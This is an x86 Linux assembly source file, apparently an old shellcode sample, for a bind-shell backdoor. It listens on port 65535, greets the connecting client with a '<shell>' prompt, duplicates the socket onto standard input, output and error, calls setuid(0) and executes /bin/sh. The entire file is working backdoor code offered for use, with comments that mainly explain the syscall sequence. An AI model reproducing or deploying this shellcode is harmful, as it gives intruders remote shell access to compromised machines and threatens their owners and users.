/*
; Shellcode backdoor binding port 65535 with shellback 
; AF_INET = 2
; SOCK_STREAM = 1
; 1 = socket()
; 2 = bind()
; 3 = connect()
; 4 = listen()
; 5 = accept()
; by beck
beck@math.co.ro
*/
.globl main
main:
xor %eax,%eax
xor %ebx,%ebx
xor %edx,%edx


/* socket() */

sub $0xf,%esp
mov %esp,%ecx
movb $102,%al
addb $1,%bl
movb $2,(%ecx)    
movb $1,4(%ecx)    
mov %edx, 8(%ecx)
int $0x80
add $0xf,%esp

/* bind() */

mov %eax,%edi
push %edx
movl %edi,(%ecx)
xor %eax,%eax  /**/
movb $102, %al /**/
xor %ebx,%ebx
movb $2, %bl
sub $0x20,%esp
mov %esp,%edx

/* FROM HERE */

movb $2,(%edx)
movw $0xffff,2(%edx)        /*PORT default 65535 */   
xor %esi,%esi
movl %esi , 4(%edx)  /*IP address in default 10.11.12.13 */
leal (%edx), %ebp

/* TO HERE:i was fighting with the pointer (%edx) but then my brain worked and told me "you need to use 16 bits instead of
   32 for sin_port because there are only 0xffff ports (2 bytes) you asshole!!!" (quarter of an hour lost with this) */

movl %ebp , 4(%ecx)
movb $0x10 , 8(%ecx) /**/
int $0x80
add $0x20,%esp

/* listen() */
xor %eax,%eax
movb $102 , %al
subl $0x8 , %esp
mov %esp , %ecx
xor %ebx,%ebx
movb $4,%bl
movl %edi,(%ecx)
movb $0xa,4(%ecx)
int $0x80
add $0x8,%esp

/* accept() */

sub $0x30,%esp
mov %esp,%ecx
xor %eax,%eax
movb $102,%al
xor %ebx,%ebx
movb $5,%bl
movl %edi, (%ecx) 
movl %ebp,4(%ecx)
add $0x30,%esp
sub $0x8,%esp
mov %esp,%edx
movb $16,(%edx)
mov %edi,%esi
leal (%edx),%edi
movl %edi,8(%ecx)
int $0x80

/* Welcome to socket */


push $0xff3e6c6c
push $0x6568733c
mov %eax,%ebx
xor %eax,%eax
movb %al,7(%esp)
xorl %edx,%edx
movb $4,%al
movl %esp,%ecx
movb $8,%dl
int $0x80

/* dup2() */
xor %eax,%eax
movb $63,%al
xor %ecx,%ecx
movb $2,%cl
int $0x80

xor %eax,%eax
movb $63,%al
xor %ecx,%ecx
movb $1,%cl
int $0x80

xor %eax,%eax
movb $63,%al
xor %ecx,%ecx
int $0x80

/* execve() */
xor %eax,%eax
xor %ebx,%ebx
movb $23,%al
int $0x80
push $0xff68732f
push $0x6e69622f
xor %eax,%eax
movb %al,7(%esp)
movl %esp,%ebx
push %eax
push %ebx
mov %esp,%ecx
mov %eax,%edx
movb $11,%al
int $0x80